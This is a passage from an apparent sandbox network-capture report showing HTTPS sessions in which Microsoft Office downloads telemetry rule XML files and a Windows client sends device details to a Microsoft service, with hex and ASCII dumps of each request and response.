EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:19 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085419Z-178bfbc474bv7whqhC1NYC1fg40000000170000000008uxp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:19 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:19 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085419Z-r1d97b9957747b9jhC1TEBgyec0000000a4g00000000eg9e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:19 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.6	49844	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 44 68 4c 70 4d 42 45 6a 55 4f 45 6b 46 52 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 35 61 36 38 66 62 34 34 65 38 35 39 61 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: /DhLpMBEjUOEkFR/.1Context: 235a68fb44e859a0
2024-11-21 08:54:19 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:54:19 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2f 44 68 4c 70 4d 42 45 6a 55 4f 45 6b 46 52 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 35 61 36 38 66 62 34 34 65 38 35 39 61 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: /DhLpMBEjUOEkFR/.2Context: 235a68fb44e859a0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
2024-11-21 08:54:19 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 2f 44 68 4c 70 4d 42 45 6a 55 4f 45 6b 46 52 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 35 61 36 38 66 62 34 34 65 38 35 39 61 30 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: /DhLpMBEjUOEkFR/.3Context: 235a68fb44e859a0
2024-11-21 08:54:20 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:54:20 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4f 70 47 32 4e 33 73 36 35 30 53 49 71 6d 46 33 39 6f 76 73 34 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: OpG2N3s650SIqmF39ovs4A.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:20 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:20 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085420Z-178bfbc474btrnf9hC1NYCb80g00000001f00000000026dq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:20 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.6	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:21 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:21 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085421Z-178bfbc474b7cbwqhC1NYC8z4n0000000150000000006chk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:21 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:21 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:21 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085421Z-178bfbc474btrnf9hC1NYCb80g00000001ag00000000c7q0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:21 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:21 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:22 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085422Z-r1d97b99577hsvhhhC1TEByb1w000000049g00000000f565 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:22 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:21 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:22 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:22 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085422Z-178bfbc474bwh9gmhC1NYCy3rs00000001c0000000003db4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:22 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:22 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:22 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 46934538-601e-0050-507b-3b2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085422Z-178bfbc474bpnd5vhC1NYC4vr4000000017g000000006s70 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:22 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:23 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:23 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:23 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: c363d474-d01e-0028-1b8c-3a7896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085423Z-r1d97b99577tssmjhC1TEB8kan0000000a2g0000000042e6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:23 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:23 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:23 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: f909e935-c01e-0049-358c-3aac27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085423Z-178bfbc474b9fdhphC1NYCac0n000000018g0000000013k5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
